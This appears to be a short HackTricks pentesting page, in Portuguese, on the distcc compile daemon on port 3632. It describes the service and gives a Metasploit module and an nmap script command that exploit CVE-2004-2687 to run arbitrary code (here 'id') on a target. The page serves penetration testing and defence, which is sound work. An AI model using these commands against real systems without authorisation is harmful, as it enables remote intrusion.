3632 - Pentesting distcc

Support HackTricks

Informações Básicas

Distcc é uma ferramenta que melhora o processo de compilação utilizando o poder de processamento ocioso de outros computadores na rede. Quando distcc é configurado em uma máquina, essa máquina é capaz de distribuir suas tarefas de compilação para outro sistema. Este sistema receptor deve estar executando o daemon distccd e deve ter um compilador compatível instalado para processar o código enviado.

Porta padrão: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploração

Verifique se é vulnerável a CVE-2004-2687 para executar código arbitrário:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Eu não acho que o shodan detecta este serviço.

Resources

Post criado por Álex B (@r1p)

Support HackTricks

Last updated